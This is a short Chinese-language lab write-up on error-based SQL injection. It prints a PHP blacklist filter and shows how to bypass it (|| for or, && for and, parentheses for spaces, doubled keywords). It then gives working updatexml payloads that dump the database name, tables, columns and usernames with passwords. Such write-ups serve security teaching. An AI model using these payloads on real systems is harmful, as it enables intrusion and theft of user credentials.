判断是单引号字符注入:
?id=1''
当接下来进行操作时会发现很多被注释掉了,查看源码黑名单过滤了很多:or、and、空格等等:
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
这里就需要绕过了:用||替代or、用&&替代and、用()替代空格
爆库:
-1'||updatexml(1,concat(0x7e,database()),0)||'1'='1
爆表:
?id=-1' || updatexml(1, concat(0x7e, (select (group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=0x7365637572697479))) ,1)||'1'='1
爆列:
?id=-1' || updatexml(1, concat(0x7e, (select (group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users'))) ,1)||'1'='1
爆数据:
?id=-1' || updatexml(1, concat(0x7e, (select (group_concat(username,passwoorrd))from(users))) ,1)||'1'='1